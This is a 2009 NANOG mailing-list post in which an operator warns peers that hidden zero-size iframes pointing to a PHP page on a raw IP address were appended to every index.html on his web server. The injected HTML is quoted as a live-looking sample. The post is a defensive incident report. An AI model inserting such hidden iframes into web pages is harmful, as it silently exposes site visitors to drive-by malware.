nanog mailing list archives

Malicious code just found on web server

From: Russell Berg <berg () wins net>
Date: Fri, 17 Apr 2009 15:39:06 -0500

We just discovered what we suspect is malicious code appended to all index.html files on our web server as of the 11:00 
central time hour today:
 
src="http://77.92.158.122/webmail/inc/web/index.php";
style="display: none;" height="0" width="0"></iframe> 
<iframe src="http://77.92.158.122/webmail/inc/web/index.php";
style="display: none;" height="0" width="0"></iframe> </body> </html>

IP address resolves to mail.yaris.com; couldn't find any A/V site references to this.

Google search reveals some Chinese sites with references to the URL today, but nothing substantial in the translation.

Just a heads up for folks; we have a team investigating...

Russell Berg
Dir - Product Development
Airstream Communications
berg () wins net
715-832-3726

Current thread:

Malicious code just found on web server Russell Berg (Apr 17)
- Re: Malicious code just found on web server Neil (Apr 20)
  - Re: Malicious code just found on web server Paul Ferguson (Apr 20)
    - Re: Malicious code just found on web server Mike Lewinski (Apr 20)
    - Re: Malicious code just found on web server Paul Ferguson (Apr 20)
    - Re: Malicious code just found on web server Gadi Evron (Apr 20)
    - RE: Malicious code just found on web server Chuck Schick (Apr 21)
    - Re: Malicious code just found on web server Nathan Ward (Apr 21)
  - Re: Malicious code just found on web server Nick Chapman (Apr 20)
    - Re: Malicious code just found on web server Paul Ferguson (Apr 20)
    - Re: Malicious code just found on web server Ingo Flaschberger (Apr 20)

(Thread continues...)